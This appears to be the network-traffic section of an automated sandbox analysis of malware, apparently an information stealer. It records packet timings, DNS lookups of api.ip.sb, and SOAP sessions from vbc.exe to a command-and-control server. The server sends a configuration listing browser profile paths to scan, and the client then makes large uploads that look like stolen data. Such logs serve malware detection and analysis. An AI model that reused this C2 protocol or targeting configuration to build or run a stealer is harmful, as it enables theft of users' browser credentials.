                                                        Jun 16, 2022 14:44:33.666769981 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.666793108 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.666814089 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.666836023 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.666857958 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.666878939 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.666963100 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.666995049 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667016983 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667263031 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667314053 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667334080 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667363882 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667395115 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667444944 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667505026 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667537928 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667567968 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667591095 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667670012 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667725086 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667748928 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667771101 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667840004 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667902946 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667926073 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.667994976 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668042898 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668106079 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668128014 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668169975 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668227911 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668276072 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668298006 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668318987 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668378115 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668517113 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668545008 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668580055 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668603897 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.668694973 CEST4991517910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.669262886 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.669286013 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.669457912 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.669478893 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.671310902 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.671544075 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.671612024 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.671652079 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.671812057 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.672336102 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.672454119 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.672547102 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.672564983 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.672744036 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.672816992 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.673218966 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.673295975 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.673664093 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.673815966 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.691405058 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.691427946 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.691450119 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.691476107 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.691559076 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.691586018 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.691629887 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.691653967 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.691677094 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.691756964 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.722379923 CEST1791049915185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.725545883 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.748317957 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.748460054 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.749598026 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.773118973 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.773799896 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.796133995 CEST4991517910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.796468019 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.796574116 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.796591997 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.796657085 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.819209099 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.819313049 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.819359064 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.819441080 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.819494009 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.819560051 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.819648027 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.819696903 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.841773033 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.841835976 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.841872931 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.841931105 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.842046976 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.842108011 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.842206955 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.842263937 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.842363119 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.842413902 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.842540026 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.842596054 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.842623949 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.842678070 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.842806101 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.842859983 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.842931986 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.843003035 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.843126059 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.843182087 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.843255043 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.843322992 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.843483925 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.843537092 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.864360094 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.864439964 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.864461899 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.864520073 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.864535093 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.864584923 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.864707947 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.864762068 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.864860058 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.864912033 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.864989996 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.865037918 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.865103960 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.865151882 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.865222931 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.865278959 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.865339994 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.865390062 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.865499020 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.865546942 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.865698099 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.865748882 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.865859985 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.865941048 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.866017103 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.866070032 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.866220951 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.866276979 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.866357088 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.866427898 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.866468906 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.866524935 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.866586924 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.866660118 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.866822004 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.866940022 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.866974115 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.866997004 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.886873960 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.887005091 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.887013912 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.887084007 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.887154102 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.887221098 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.887367010 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.887430906 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.887470961 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.887523890 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.887634993 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.887686014 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.887798071 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.887859106 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.887970924 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.888032913 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.888149977 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.888216972 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.888324022 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.888374090 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.888483047 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.888530970 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.889210939 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.889286041 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.891599894 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.891618967 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.891695023 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.891752005 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.909512043 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.909609079 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.909619093 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.909723043 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.909807920 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.909879923 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.910022020 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.910110950 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.910309076 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.910332918 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.910413980 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.910442114 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.910470009 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.910521984 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.910573006 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.910609961 CEST1791049917185.222.58.90192.168.2.5
                                                        Jun 16, 2022 14:44:33.910651922 CEST4991717910192.168.2.5185.222.58.90
                                                        Jun 16, 2022 14:44:33.910773039 CEST1791049917185.222.58.90192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 16, 2022 14:43:15.274486065 CEST | 50393 | 53 | 192.168.2.5 | 8.8.8.8
Jun 16, 2022 14:43:15.307981014 CEST | 54850 | 53 | 192.168.2.5 | 8.8.8.8
Jun 16, 2022 14:44:13.569449902 CEST | 52078 | 53 | 192.168.2.5 | 8.8.8.8
Jun 16, 2022 14:44:13.610606909 CEST | 53759 | 53 | 192.168.2.5 | 8.8.8.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 16, 2022 14:43:15.274486065 CEST | 192.168.2.5 | 8.8.8.8 | 0x9062 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jun 16, 2022 14:43:15.307981014 CEST | 192.168.2.5 | 8.8.8.8 | 0xc293 | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jun 16, 2022 14:44:13.569449902 CEST | 192.168.2.5 | 8.8.8.8 | 0x855b | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)
Jun 16, 2022 14:44:13.610606909 CEST | 192.168.2.5 | 8.8.8.8 | 0x58d | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 16, 2022 14:43:15.296925068 CEST | 8.8.8.8 | 192.168.2.5 | 0x9062 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jun 16, 2022 14:43:15.330672979 CEST | 8.8.8.8 | 192.168.2.5 | 0xc293 | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jun 16, 2022 14:44:13.592020988 CEST | 8.8.8.8 | 192.168.2.5 | 0x855b | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jun 16, 2022 14:44:13.632795095 CEST | 8.8.8.8 | 192.168.2.5 | 0x58d | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
                                                        • 185.222.58.90:17910
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49780 | 185.222.58.90 | 17910 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | kBytes transferred | Direction | Data
Jun 16, 2022 14:43:07.412843943 CEST | 1261 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 185.222.58.90:17910
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Jun 16, 2022 14:43:07.436301947 CEST | 1262 | IN | HTTP/1.1 100 Continue
Jun 16, 2022 14:43:07.461302042 CEST | 1265 | IN | HTTP/1.1 200 OK
Content-Length: 212
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 16 Jun 2022 12:43:07 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jun 16, 2022 14:43:14.662225962 CEST | 1939 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
Host: 185.222.58.90:17910
Content-Length: 144
Expect: 100-continue
Accept-Encoding: gzip, deflate
Jun 16, 2022 14:43:14.686064959 CEST | 1939 | IN | HTTP/1.1 100 Continue
Jun 16, 2022 14:43:14.732625008 CEST | 1950 | IN | HTTP/1.1 200 OK
Content-Length: 4744
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 16 Jun 2022 12:43:14 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        1 | 192.168.2.5 | 49849 | 185.222.58.90 | 17910 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Jun 16, 2022 14:43:34.228127003 CEST | 2469 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 1105566
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:43:34.252454042 CEST | 2470 | IN | HTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:43:35.144640923 CEST | 3633 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 147
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:43:34 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                        Jun 16, 2022 14:43:35.148380995 CEST | 3634 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 1105558
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:43:35.171581984 CEST | 3634 | IN | HTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:43:35.475014925 CEST | 5252 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 261
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:43:34 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        2 | 192.168.2.5 | 49859 | 185.222.58.90 | 17910 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Jun 16, 2022 14:44:00.032973051 CEST | 12877 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 137
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Connection: Keep-Alive
                                                        Jun 16, 2022 14:44:00.056508064 CEST | 12877 | IN | HTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:00.081240892 CEST | 12878 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 212
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:43:59 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                        Jun 16, 2022 14:44:12.046207905 CEST | 12928 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 144
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:44:12.070036888 CEST | 12928 | IN | HTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:12.117949963 CEST | 12929 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 4744
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 16 Jun 2022 12:44:12 GMT
                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Cen


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        3 | 192.168.2.5 | 49915 | 185.222.58.90 | 17910 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Jun 16, 2022 14:44:33.402445078 CEST | 14283 | OUT | POST / HTTP/1.1
                                                        Content-Type: text/xml; charset=utf-8
                                                        SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                        Host: 185.222.58.90:17910
                                                        Content-Length: 1105829
                                                        Expect: 100-continue
                                                        Accept-Encoding: gzip, deflate
                                                        Jun 16, 2022 14:44:33.425847054 CEST | 14283 | IN | HTTP/1.1 100 Continue
                                                        Jun 16, 2022 14:44:33.722379923 CEST | 15405 | IN | HTTP/1.1 200 OK
                                                        Content-Length: 147
                                                        Content-Type: text/xml; charset=utf-8
                                                        Server: Microsoft-HTTPAPI/2.0
